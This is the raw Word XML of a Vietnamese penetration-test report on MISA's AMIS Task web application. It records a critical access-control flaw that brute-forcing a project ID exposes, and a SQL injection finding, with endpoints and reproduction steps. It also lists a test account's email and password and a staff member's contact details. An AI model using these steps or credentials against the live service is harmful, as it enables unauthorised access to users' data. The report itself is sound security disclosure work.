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jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="4472C4" w:themeColor="accent5"/>
          <w:sz w:val="96"/>
          <w:szCs w:val="56"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="4472C4" w:themeColor="accent5"/>
          <w:sz w:val="96"/>
          <w:szCs w:val="56"/>
        </w:rPr>
        <w:t>BÁO CÁO</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0015446D" w:rsidRDefault="0015446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15446D" w:rsidRDefault="005A1BAF">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="4472C4" w:themeColor="accent5"/>
          <w:sz w:val="34"/>
          <w:szCs w:val="34"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="4472C4" w:themeColor="accent5"/>
          <w:sz w:val="34"/>
          <w:szCs w:val="34"/>
        </w:rPr>
        <w:t>KẾT QUẢ GRAYBOX PENETRATION TESTING HỆ THỐNG</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0015446D" w:rsidRDefault="0015446D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Tên tổ chức: </w:t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  <w:t xml:space="preserve">Công ty Cổ phần </w:t>
      </w:r>
      <w:r w:rsidR="009E7183">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>MISA</w:t>
      </w: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Tên ứng dụng: </w:t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 w:rsidR="0095276E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">AMIS </w:t>
      </w:r>
      <w:r w:rsidR="00E14401">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Công Việc (Task)</w:t>
      </w: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Thời gian thực hiện: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">Tháng </w:t>
      </w:r>
      <w:r w:rsidR="00E14401">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>12</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>/2021</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:br/>
      </w:r>
    </w:p>
    <w:p w:rsidR="0015446D" w:rsidRDefault="005A1BAF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1: THÔNG TIN CHUNG</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0015446D" w:rsidRDefault="0015446D">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="28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8"/>
        <w:gridCol w:w="4786"/>
      </w:tblGrid>
      <w:tr w:rsidR="0015446D">
        <w:trPr>
          <w:trHeight w:val="97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tổ chức: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Công ty cổ phần MISA</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0015446D">
        <w:trPr>
          <w:trHeight w:val="1565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Lê Bình An (lban@software.misa.com.vn)</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="0015446D" w:rsidRDefault="005A1BAF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Sđt: 0979700145</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0015446D">
        <w:trPr>
          <w:trHeight w:val="97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F86A5C" w:rsidP="00E2069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7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</w:t>
            </w:r>
            <w:r w:rsidR="00EB6BFA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12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/202</w:t>
            </w:r>
            <w:r w:rsidR="00E2069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14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</w:t>
            </w:r>
            <w:r w:rsidR="00E2069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10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/202</w:t>
            </w:r>
            <w:r w:rsidR="00E2069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</w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0015446D">
        <w:trPr>
          <w:trHeight w:val="1017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E14401" w:rsidP="009E7183">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rStyle w:val="InternetLink"/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E14401">
              <w:rPr>
                <w:rStyle w:val="InternetLink"/>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="1155CC"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t>https://testamisapp.misa.vn</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0015446D">
        <w:trPr>
          <w:trHeight w:val="925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Graybox</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0015446D">
        <w:trPr>
          <w:trHeight w:val="241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 sử dụng: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806578" w:rsidRDefault="00E14401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  <w:r w:rsidRPr="00E14401">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:color w:val="3465A4"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t>minhle.tester@gmail.com / Aa@123456</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00677B14" w:rsidRDefault="00677B14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</w:p>
        </w:tc>
      </w:tr>
    </w:tbl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2: KẾT QUẢ ĐÁNH GIÁ</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0015446D" w:rsidRDefault="0015446D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5140"/>
        <w:gridCol w:w="5138"/>
      </w:tblGrid>
      <w:tr w:rsidR="0015446D">
        <w:trPr>
          <w:trHeight w:val="1106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chung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5A1BAF" w:rsidP="002D2F47">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="009E71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Có </w:t>
            </w:r>
            <w:r w:rsidR="00E1440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9E71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lỗi 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Đề xuất khắc phục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E1440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2</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0015446D">
        <w:trPr>
          <w:trHeight w:val="853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nghiêm trọng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E1440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cao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trung bình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AC472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thấp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9E718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</w:tbl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46D" w:rsidRDefault="005A1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Checklisk danh mục lỗ hổng:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0015446D" w:rsidRDefault="009E7183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(File đính kèm </w:t>
      </w:r>
      <w:r w:rsidR="007C532A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>amis-task</w:t>
      </w:r>
      <w:hyperlink r:id="rId8">
        <w:r w:rsidR="005A1BAF">
          <w:rPr>
            <w:rStyle w:val="InternetLink"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
            <w:sz w:val="28"/>
            <w:szCs w:val="28"/>
          </w:rPr>
          <w:t>.xlsx</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="005A1BAF">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>)</w:t>
      </w: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Thông tin chi tiết và cách khắc phục</w:t>
      </w:r>
    </w:p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Danh sách lỗi</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="10921" w:type="dxa"/>
        <w:tblInd w:w="-635" w:type="dxa"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="1445"/>
        <w:gridCol w:w="3038"/>
        <w:gridCol w:w="3573"/>
        <w:gridCol w:w="1339"/>
        <w:gridCol w:w="1526"/>
      </w:tblGrid>
      <w:tr w:rsidR="0015446D" w:rsidTr="00AC472D">
        <w:trPr>
          <w:trHeight w:val="411"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1445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lỗi</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3038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lỗi</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3573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 hổng trong danh mục</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1339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1526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</w:tr>
      <w:tr w:rsidR="0015446D" w:rsidTr="00AC472D">
        <w:trPr>
          <w:trHeight w:val="1042"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1445" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="0015446D" w:rsidRDefault="002B57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r w:rsidR="00E206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E718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15446D" w:rsidRPr="009E7183" w:rsidRDefault="002B57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Insecure Direct Object References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15446D" w:rsidRDefault="00E2069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Testing </w:t>
            </w:r>
            <w:r w:rsidR="009E7183">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t>Broken Access Control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2.1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1526" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="C00000"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="0015446D" w:rsidRDefault="00E20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Critial</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E14401" w:rsidTr="00AC472D">
        <w:trPr>
          <w:trHeight w:val="1042"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1445" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00E14401" w:rsidRDefault="002B57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TASK-02</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3038" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00E14401" w:rsidRDefault="002B57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SQL injection in </w:t>
            </w:r>
            <w:r w:rsidRPr="002B57D0">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t>ListProjectID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param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E14401" w:rsidRDefault="002B57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for SQL injection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E14401" w:rsidRDefault="002B57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2.2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1526" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="C00000"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00E14401" w:rsidRDefault="008805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Critial</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="0015446D" w:rsidRDefault="001544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5446D" w:rsidRDefault="005A1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Mô tả chi tiết:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0015446D" w:rsidRDefault="002B57D0" w:rsidP="002B57D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7D0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Insecure Direct Object References</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0015446D" w:rsidRDefault="005A1BA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Mã lỗi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B57D0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Task</w:t>
      </w:r>
      <w:r w:rsidR="009E7183">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>-01</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0015446D" w:rsidRDefault="005A1BA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Tên lỗ hổng trong danh mục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E20693">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Testing broken access control</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0015446D" w:rsidRDefault="005A1B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Vị trí lỗi</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidR="002B57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44" w:type="dxa"/>
        <w:tblInd w:w="-113" w:type="dxa"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="714"/>
        <w:gridCol w:w="7907"/>
        <w:gridCol w:w="1523"/>
      </w:tblGrid>
      <w:tr w:rsidR="0015446D" w:rsidTr="002B57D0">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="714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8265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1165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5446D" w:rsidTr="002B57D0">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="714" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto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65" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="0015446D" w:rsidRDefault="002B57D0" w:rsidP="002B57D0">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:ind w:left="0"/>
            </w:pPr>
            <w:r w:rsidRPr="002B57D0">
              <w:t>/APIS/TaskAPI/api/Report/getReportGanttDataGroupByParent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15446D" w:rsidRPr="00880559" w:rsidRDefault="009303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559">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>ListProjectID in body request</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002B57D0" w:rsidTr="00880559">
        <w:trPr>
          <w:trHeight w:val="41"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="714" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="002B57D0" w:rsidRDefault="002B57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65" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="002B57D0" w:rsidRPr="002B57D0" w:rsidRDefault="002B57D0" w:rsidP="002B57D0">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:ind w:left="0"/>
            </w:pPr>
            <w:r w:rsidRPr="002B57D0">
              <w:t>/APIS/TaskAPI/api/Report/getMaskImportantTaskByListProjectIDV2/1/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B57D0" w:rsidRPr="00880559" w:rsidRDefault="002B57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559">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>ListProjectID</w:t>
            </w:r>
            <w:r w:rsidR="009303C1" w:rsidRPr="00880559">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve"> in body request</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002B57D0" w:rsidTr="002B57D0">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="714" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="002B57D0" w:rsidRDefault="002B57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65" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="002B57D0" w:rsidRPr="002B57D0" w:rsidRDefault="002B57D0" w:rsidP="002B57D0">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:ind w:left="0"/>
            </w:pPr>
            <w:r w:rsidRPr="002B57D0">
              <w:t>/APIS/TaskAPI/api/Project/getByID/</w:t>
            </w:r>
            <w:r w:rsidR="009303C1">
              <w:t>[</w:t>
            </w:r>
            <w:r w:rsidR="009303C1" w:rsidRPr="009303C1">
              <w:t>ListProjectID</w:t>
            </w:r>
            <w:r w:rsidR="009303C1">
              <w:t>]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2B57D0" w:rsidRPr="002B57D0" w:rsidRDefault="002B57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Pr="00326570" w:rsidRDefault="005A1BAF" w:rsidP="00CB45B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="0023593E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r w:rsidR="009303C1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Lỗi kiểm soát truy cập cho phép xem nội dung công việc</w:t>
      </w:r>
      <w:r w:rsidR="00880559">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> cá nhân</w:t>
      </w:r>
      <w:r w:rsidR="009303C1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> của người dùng khác </w:t>
      </w:r>
      <w:r w:rsidR="00880559">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">cùng công ty </w:t>
      </w:r>
      <w:r w:rsidR="009303C1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">thông qua tham số </w:t>
      </w:r>
      <w:r w:rsidR="009303C1" w:rsidRPr="002B57D0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>ListProjectID</w:t>
      </w:r>
      <w:r w:rsidR="009303C1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">, giá trị </w:t>
      </w:r>
      <w:r w:rsidR="009303C1" w:rsidRPr="002B57D0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>ListProjectID</w:t>
      </w:r>
      <w:r w:rsidR="009303C1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> có thể brute force (1-&gt; 10000+)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0015446D" w:rsidRDefault="005A1BAF" w:rsidP="009E7183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Nguy cơ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303C1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Xem thông tin trái phép</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0015446D" w:rsidRPr="00326570" w:rsidRDefault="005A1BAF">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:highlight w:val="red"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00326570">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:highlight w:val="red"/>
        </w:rPr>
        <w:t>Mức độ</w:t>
      </w:r>
      <w:r w:rsidR="009E7183" w:rsidRPr="00326570">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:highlight w:val="red"/>
        </w:rPr>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r w:rsidR="003B1F4F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:highlight w:val="red"/>
        </w:rPr>
        <w:t>Nguy hiểm</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009E7183" w:rsidRPr="009E7183" w:rsidRDefault="005A1BAF" w:rsidP="0001779F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Nguyên nhân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326570">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Lỗi kiểm soát truy cập</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0015446D" w:rsidRPr="009E7183" w:rsidRDefault="005A1BAF" w:rsidP="0001779F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Khắc phục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326570">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Khắc phục kiểm soát truy cập</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009E7183" w:rsidRDefault="009E7183" w:rsidP="0001779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Dựng lại lỗ hổng </w:t>
      </w:r>
      <w:r w:rsidRPr="009E7183">
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002D2F47" w:rsidRDefault="0023593E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Bước 1: </w:t>
      </w:r>
      <w:r w:rsidR="009303C1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Bắt request bằng burpsuite</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009303C1" w:rsidRDefault="009303C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7E21E" wp14:editId="133829E0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3E" w:rsidRDefault="009303C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Bước 2: Brute force giá trị tham số </w:t>
      </w:r>
      <w:r w:rsidRPr="009303C1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>ListProjectID</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00021495" w:rsidRDefault="00021495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B72982" wp14:editId="372A91AB">
            <wp:extent cx="5943600" cy="493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95" w:rsidRDefault="00021495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5059A7" wp14:editId="1249F97F">
            <wp:extent cx="5943600" cy="32328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269"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="323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495" w:rsidRDefault="00F94B6C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Tìm ra được </w:t>
      </w:r>
      <w:r w:rsidRPr="009303C1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>ListProjectID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của user Loan Đào là 9487 và thông tin chi tiết của TaskID</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00021495" w:rsidRDefault="00021495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21495" w:rsidRDefault="00021495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90DA1" w:rsidRDefault="00490DA1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7F0E" w:rsidRDefault="00C77F0E" w:rsidP="00C77F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 injection</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C77F0E" w:rsidRDefault="00C77F0E" w:rsidP="00C77F0E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Mã lỗi</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>: Task-01</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C77F0E" w:rsidRDefault="00C77F0E" w:rsidP="00C77F0E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Tên lỗ hổng trong danh mục</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">:  Testing </w:t>
      </w:r>
      <w:r w:rsidR="0048559F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>for SQL injection</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C77F0E" w:rsidRDefault="00C77F0E" w:rsidP="00C77F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Vị trí lỗi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77F0E" w:rsidRDefault="00C77F0E" w:rsidP="00C77F0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44" w:type="dxa"/>
        <w:tblInd w:w="-113" w:type="dxa"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="714"/>
        <w:gridCol w:w="8265"/>
        <w:gridCol w:w="1165"/>
      </w:tblGrid>
      <w:tr w:rsidR="00C77F0E" w:rsidTr="00C03CEC">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="714" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="5B9BD5" w:themeFill="accent1"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00C77F0E" w:rsidRDefault="00C77F0E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8265" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="5B9BD5" w:themeFill="accent1"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00C77F0E" w:rsidRDefault="00C77F0E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1165" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="5B9BD5" w:themeFill="accent1"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00C77F0E" w:rsidRDefault="00C77F0E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77F0E" w:rsidTr="00C03CEC">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="714" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
